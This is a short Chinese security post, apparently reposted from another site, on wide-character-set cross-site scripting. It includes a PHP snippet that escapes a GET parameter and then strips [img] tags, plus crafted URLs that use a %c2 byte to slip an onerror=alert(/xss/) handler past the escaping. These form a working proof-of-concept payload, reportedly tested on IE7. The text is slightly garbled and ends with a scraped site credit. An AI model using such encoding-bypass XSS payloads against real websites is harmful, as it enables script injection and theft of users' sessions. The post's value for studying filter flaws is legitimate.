转自:狼族
作者:jackal
Copy code
$f=htmlspecialchars($_GET["f"]);
echo preg_replace("/\s*\[img\](.+?)\[\/img\]\s*/i","", $f);
?>
注意编码方式是utf-8
提交
xss.php?f=【img]/Article/UploadFiles/200809/20080902083802508.gif[/img]
这里可以alert(1)
同样还是利用%c1构造:
xss.php?f=【img]onerror=alert(/xss/)%20%c2[/img]
引入了onerror,我们我们需要的功能了,
宽字符集跨站
,电脑资料
《宽字符集跨站》(http://meiwen.anslib.com)。IE7下测试通过。
utf-8在IE6下也有类似的问题。